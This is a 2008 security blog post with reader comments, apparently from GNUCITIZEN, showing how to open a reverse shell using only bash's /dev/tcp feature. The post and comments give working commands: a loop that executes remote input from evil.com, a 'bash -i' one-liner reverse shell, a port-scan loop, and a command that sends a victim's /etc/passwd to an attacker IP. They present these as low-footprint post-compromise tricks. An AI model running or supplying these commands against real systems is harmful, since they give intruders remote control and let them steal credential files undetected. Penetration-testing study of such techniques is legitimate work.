Reverse Shell with Bash

published: April 19th, 2008

I am stuck at the Dubai International Airport and I have nothing else interesting to do. So, I though I might share a simple technique which will go into the Agile Hacking project. Here I will show you how to create a reverse command shell without using 3rd-party tools such as the all mighty netcat. Please read on!

When the pentester compromises a machine they often need to provide themselves with a user friendly access to the system. This is where command shells come into place. It is worth noting that there are a couple of variants of command shells. The typical shell consists of a generic network client, typically netcat, listening on a remote port which pipes output into something like bash. Another type of shell, which is known to be suitable when the pentester is restricted in terms of network service connectivity/availability, is the reverse shell which consists of a generic network client, again something like netcat, connecting to the attacker’s machine and piping input to bash. Most of the time, the attacker will use netcat, because this is the tool that is suggested in most security references and books.

Although netcat is quite useful, and you may have to use it in most cases, here is a simple technique which emulates what exactly netcat does but it relies on bash only. Let’s see how.

In step one we start a listening service on our box. We can use netcat, or whatever you might have in hand.
```
$ nc -l -p 8080 -vvv
```
On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.
```
$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
```

There you go. Now everything we type in our local listening server will get executed on the target and the output of the commands will be piped back. Keep in mind that we don’t use any 3rd-party tools on the target but its default shell. This technique comes extremely handy in many situations and it leaves very small footprint on the targeted system.

» more | » comments rss | posted by pdp » about

comments

tf8 responds:

nice rip pdp, keep goin

Adrian 'pagvac' Pastor responds:

This is the kind of stuff I like. As we tend to say: “there is always an easier way to solve the problem”.

pdp responds:

glad to be of help :)

ernie responds:

This shit doesn’t work everywhere, you need to have compiled support in bash for it, and since it’s very broken, most distributions do not ship bash enabled with this feature.

Anonymous responds:

Nice, but I preferred the original write-up ;)

http://labs.neohapsis.com/2008.....literally/

Tecky responds:

To bad is not working on debian distributions.

dude dyde responds:

give credit where its due. this was posted yesterday on some other sites prior.

kcghost responds:

a cool trick, but is there a convenient way of doing this in debian? Debian doesnt have the “/dev/tcp” feature as part of its bash by default, is there a way to get around that and use something else?

pdp responds:

first of all, I find this feature working on far too many systems. Second, similar things can be done with TCL and 3rd, I don’t read every single blog out there to know that someone has blogged about it as well, neither I claim that it is new. If someone has posted similar technique somewhere else, it is just a coincidence. On another note, giving credits for something like this, is a bit stupid. :) It is like giving credits to someone for writing a for loop in bash. This is a feature not an ingenious hack. Also, my example significantly differs from the example provided by the blog post suggested above. thanks for the heads up and apologies to those who think that I have ripped off their work. It is certainly not the case.

otze responds:

Nice one, but on my system the man page of bash states the following: :(

NOTE: Bash, as packaged for Debian, does not support using the /dev/tcp and /dev/udp files.

pdp responds:

if you don’t have this feature compiled you can use TCL which is most likely installed on the system. Now, this defeats the purpose of the hack presented here but still it might be better in some situations when you are restricted in terms of being able to upload netcat. For more information on using TCL socket features, read the following link: http://www.tcl.tk/man/tcl8.4/TclCmd/socket.htm

pdp responds:

otze, unfortunately Debian does not support it. keep in mind that Debian mainly uses very old stable packages. Which is good and bad at the same time.

Venom23 responds:

You are my idol #1

Venom23 responds:

Yes! Works fine on Solaris 9 and 10. Always had problems getting a netcat compiled on Solaris. Hate gcc problems on Solaris. The netcat version provided by sunfreeware.com does not include the “-e” option for bidirectional communication.

pdp responds:

10x, I am glad that it works for u.

Sam responds:

I tried this on a ubuntu server and it does not work in it’s default configuration. If you build the bash using the use –enable-net-redirections build flag it will work. Just in case someone else was wondering why it wouldn’t work.

Adri responds:

Nice stuff, I really love this website :D

Jim Kelly responds:

I checked the bash man page on Mac OS X 10.5.2 and it DOES support /dev/tcp!!

Jim Kelly responds:

I just tried it on Mac OS X Leopard and it works!! caveat I connected to and from localhost so my next test, time willing will be to try to/from another host. Nothing shows up on the victim host, all std out shows up on attacker side ;-)
pdp awesome awesome tip!!!

Yash Kadakia responds:

Thanks for the tip! Its an interesting concept to minimize the footprint on the client machine.

–
Yash Kadakia
CTO, Security Brigade
http://www.securitybrigade.com
Penetration Testing, PCI DSS Compliance, Security Consulting etc.

tix responds:

you can remove the cat <&5, will be:

while read line 0<&5; do $line 2>&5 >&5; done

there is also the $REPLY var of the read builtin command.

thnks for the stuff gnucitizen.

nicolasfr responds:

Why using two lines/commands? A one liner version:

$ bash -i >& /dev/tcp/evil.com/8080 0>&1

Note: /dev/tcp support is enabled by default on Redhat. Disabled on Debian. Would be nice to list here support for other well known distro (Suse?).

pdp responds:

nicolasfr, 10x for the tip. That is much better and a lot clearer. though, I tried to be explicit with my example so that it is easy to understand.

Jim Kelly responds:

Ok here is an idea of how to turn this into a port scanner:
Say you are on box 192.168.1.2 and you want to port scan ports 79,80,81 on 192.168.1.1

do the following all on one line:

for i in 79 80 81; do echo $i & bash -i >& /dev/tcp/192.168.1.1/$i 0>&1;done

What you end up with is something like this:

bash-3.2$ for i in 79 80 81; do echo $i & bash -i >& /dev/tcp/192.168.1.1/$i 0>&1;done
[1] 5579
79
bash: connect: Connection refused
bash: /dev/tcp/192.168.1.1/79: Connection refused
[1]+  Done                    echo $i
[1] 5581
80
[1]+  Done                    echo $i
[1] 5584
81
bash: connect: Connection refused
bash: /dev/tcp/192.168.1.1/81: Connection refused
[1]+  Done                    echo $i
bash-3.2$ for i in 79 80 81; do echo $i & bash -i >& /dev/tcp/192.168.1.1/$i 0>&1;done

Closed ports give you back a “Connection refused”

Jim Kely responds:

LOL
Google is truely my friend: http://www.oreilly.com/pub/h/5299

A tcp and udp portscanner implimented in Bash ;-)

pdp responds:

sweet!

Marchiner responds:

It works ok on debian, but only using TCL! :D

But works fine!

Thx for nice post pdp!

Marchiner responds:

Ops sorry.. really don work on debian.

Works on Redhat Enterprise 4 and 5.

Marchiner responds:

Just to complement…

i know this post its about the reverse shell.
-But “debian users” whatch this post about
Default-bash:/dev/tcp

http://bugs.debian.org/cgi-bin.....bug=146464

macubergeek responds:

Marchiner: wow this bug report goes back to 2002! How much longer till it’s fixed ;-)

macubergeek responds:

Ok this is off scope for this thread, and the moderator may not want it but here’s a way to use /dev/tcp to banner a web server:

#!/bin/bash
exec 3 /dev/tcp/$1/80
echo -e "Get /simple?se=1 HTTP/1.0\n" >&3
cat <&3

You’d feed the http://www.whatever.com on the command line.

usage:

./script http://www.whatever.com

macubergeek responds:

Correction:
script should read:

#!/bin/bash
exec 3 /dev/tcp/$1/80
echo -e "Get /simple?se=1 HTTP/1.0\n" >&3
cat <&3

f0rg3 responds:

Useful, Thanks.

PsyEcho responds:

Thanks ‘pdp’. Nice concept & article. Though doesn’t work for my default Debian base, but surely gonna come handy for research! Kudos and keep up the good work :) Cheers.

pdp responds:

10x

macubergeek responds:

PDP

Yeh this was old school goodness ;-)
I love the idea of using what’s already there. Now what I’d like is an equivalent on windows!

pdp responds:

unfortunately batch is very limited but you can do similar things with WScript combined with JavaScript(JScript) or VBScript. These stuff come by default on every Windows operating system.

macubergeek responds:

pdp

thanks for pointing me in the right direction ;-)
Mr. Google sez: http://www.codeproject.com/KB/cs/ReverseRAT.aspx

LOL
Awesome!

macubergeek responds:

Fun and games with /dev/tcp and file transfer:

Ok here is how to use this bash /dev/tcp trick to move a file.

On attacker’s box: I want to move a file named test.txt to the victim box
```
cat test.txt | nc -l 3333
```
I’ll then connect out from victim to attacker’s port 3333 and pull back the file test.txt
```
bash -i >& /dev/tcp/attackersIP/8080 0>&1 > test.txt
```

Advantages: netcat stays on the attacker’s box. All I use on the victim box is what’s already there…bash ;-)

————————————–

ok so you are probably saying “That’s nice” but if I’m already on the victim and I want to say transfer /etc/password or /etc/shadow back to my attacker’s box and I’m too lazy to do terminal copy and paste…then what?

on attacker’s box do
```
nc -l -p 8080 -vvv > passwd
```

on victim box do

cat /etc/passwd > /dev/tcp/attackerIP/8080

and like magic the victim’s /etc/password is transferred to the attacker’s box.

macubergeek responds:

Transfer a file using HTTP
Say you have compromised a victim box and want to transfer a file to the victim.

1. Put the file in the web root of the attacker box (I’m thinking of the web server in backtrack.
2. Start up the web server on the attacker box
3. On the victim box do:

(echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \
1>&3 & cat 0<&3) 3 /dev/tcp/AttackerIP/80 \
| (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \
do read i; done; cat) > local_filename

Credit where credit is due:
http://www.pebble.org.uk/linux/bashbrowser

macubergeek responds:

Here is an important thing I just realized…d’oh
this /dev/tcp/ thing can only connect outbound, it cannot listen and receive a connection like netcat. As far as I can tell ;-)

respond

Contributing Hacker

GNUCITIZEN is one of the most influential organizations of its kind, reaching thousands of users every day and having a strong relationship with numerous printed and web-based media outlets. Part of our mission is to let others succeed the same way GNUCITIZEN did. Therefore, if you have a research or an interesting information you would like to share, contact us. We can put you right on the spot in order to make most of your knowledge and time. A society wont be as effective without synergy and collaboration between its members.

House of Hackers

House of Hackers is a hacker community network. The House of Hackers community is established to support the hacker culture, mindset, way of life, ideologies, political views, vision, etc.

Members of the community are able to exchange ideas with each other, communicate, form groups, elite circles and tiger/red teams, conglomerate around projects and participate in a hacker recruitment market. The market is designed to provide business opportunities to the House of Hackers members in a free, open and fair manner.

If you want to become a sponsor or you would like to explore business opportunities with the House of Hackers, contact us now.

GNUCITIZEN

navigation